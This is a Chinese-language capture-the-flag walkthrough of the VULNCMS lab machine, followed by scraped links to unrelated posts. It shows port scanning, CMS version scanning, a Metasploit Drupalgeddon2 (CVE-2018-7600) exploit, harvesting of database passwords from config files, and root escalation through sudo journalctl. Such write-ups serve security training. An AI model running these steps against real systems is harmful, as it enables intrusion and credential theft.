靶机准备

导入虚拟机,并将网络模式设置为NAT



扫描ip

netdiscover -r 192.168.164.0/24

渗透测试

扫描端口

nmap -sS -sV -T5 -A -p- 192.168.164.191



其中有3个端口开放了http服务

依次访问80、8081、9001

其中80是w3.css 5000端口是WordPress 8081端口是Joomla 9001端口是drupal

cms版本扫描

1.wpscan --url http://192.168.164.191:5000/-e u

得知wordpress版本为5.7.2(这个前面nmap也扫出了)和用户名wordpress_admin

2.perl joomscan.pl --url http://192.168.164.191:8081/

得到joomla版本3.4.3

3.python3 cmsmap.py http://192.168.164.191:9001

 得到drupal版本7.54



drupal 7.54有个RCE漏洞CVE-2018-7600



使用msf,可以成功获取到一个meterpreter

use exploit/unix/webapp/drupal_drupalgeddon2

set rhost 192.168.164.191

set rport 9001

run



转换为交互式shell

python3 -c "import pty;pty.spawn('/bin/bash')"

不是root权限

提权

查看具备suid的有那些命令

find / -perm -u=s -type f 2>/dev/null



没有能直接用来提权的。

开放了22ssh端口,收集信息

cat /etc/passwd

ls -l /home



发现elliot、tyrell、ghost这三个普通用户

在/var/www/html/drupal/sites/default/settings.php找到到drupal配置文件,得到数据库用户名密码:drupal_admin/p@$$_C!rUP@!_cM5

在/var/www/html/joomla/configuration.php找到joomla配置信息,收集到数据库用户名:joomla_admin/j00m1_@_dBpA$$

在/var/www/html/wordpress/public_html/wp-config.php找到wordpress配置信息,收集到数据库用户名密码:wp_admin/UUs3R_C!B@p@55



这里我着这几个数据库都连接不上

再找有用的信息

在/drupal/misc/tyrell.passwenji文件中找到用户及密码tyrell/mR_R0bo7_i5_R3@!_



切换到用户



发现用户可以无密码执行root权限文件/bin/journalctl



获取root权限

sudo journalctl

!/bin/sh



到root目录下获得flag

VULNCMS的更多相关文章

  1. 2020 10月CUMTCTF wp

    华为杯 × 签到杯√ 论比赛过程来说没什么很大收获 但看师傅们的wp感触很多 赛后复现慢慢学吧 Web babyflask flask ssti模板注入: payload{{key}}发现[]以及类似 ...

随机推荐

  1. P3400【仓鼠窝 】

    思路清奇,代码简洁的好题 问题大体分两部: 记录子矩阵个数,统计每一个点作为右下角时可以得到多少矩形,加起来就是答案 剪掉墙挡住的地方 考虑从右下角开始,如果有0已经挡住了矩阵,那么更靠左.上的0都卵 ...

  2. Note -「Min_25 筛」“你就说这素因子你要不要吧?你要不要?”

      赛上想写,Track Lost 了属于是. \(\mathscr{Intro}\)   Min_25 筛是用于求积性函数前缀和,同时顺带求出一些"有意思"的信息的筛法.   一 ...

  3. Solution -「SDOI 2018」「洛谷 P4606」战略游戏

    \(\mathcal{Description}\)   Link.   给定一个 \(n\) 个点 \(m\) 条边的无向连通图,\(q\) 次询问,每次给出一个点集 \(s\),求至少在原图中删去多 ...

  4. vue前端渲染和thymeleaf模板渲染冲突问题

    vue前端渲染和thymeleaf模板渲染冲突问题 话不多说直接上现象: 解决办法: 在此做个记录吧,说不定以后会碰到 <<QIUQIU&LL>>

  5. IDEA2019.2.2激活码,亲测可用

    3AGXEJXFK9-eyJsaWNlbnNlSWQiOiIzQUdYRUpYRks5IiwibGljZW5zZWVOYW1lIjoiaHR0cHM6Ly96aGlsZS5pbyIsImFzc2lnb ...

  6. 使用ensp模拟器中的防火墙(USG6000V)配置NAT(网页版)

    使用ensp模拟器中的防火墙(USG6000V)配置NAT(网页版)一.NAT介绍NAT(Network Address Translation,网络地址转换):简单来说就是将内部私有地址转换成公网地 ...

  7. 说出来你可能不信,我用excel就能做一张高端的统计报表

    统计报表是指各级企事业.行政单位按规定的表格形式.内容.时间要求报送程序,自上而下统一布置,提供统计资料的一种统计调查方式.统计报表具有来源可靠.回收率高.方式灵活等特点,是各个基层企业或事业单位填报 ...

  8. Linux 启动、停止、重启jar包脚本

    转至:https://www.cnblogs.com/foolash/p/13824647.html startOrStropJar.sh #!/bin/bash #这里可替换为你自己的执行程序,其他 ...

  9. Python:Scrapy(三) 进阶:额外的一些类ItemLoader与CrawlSpider,使用原理及总结

    学习自:Python Scrapy 爬虫框架实例(一) - Blue·Sky - 博客园 这一节是对前两节内容的补充,涉及内容为一些额外的类与方法,来对原代码进行改进 原代码:这里并没有用前两节的代码 ...

  10. 非关系型数据库redis

    Redis初始 redis中不区分字母的大小写 查看端口 ss tnlp 安装 编译安装(需要先配置epel源) yum install -y redis 编译安装 wget https://down ...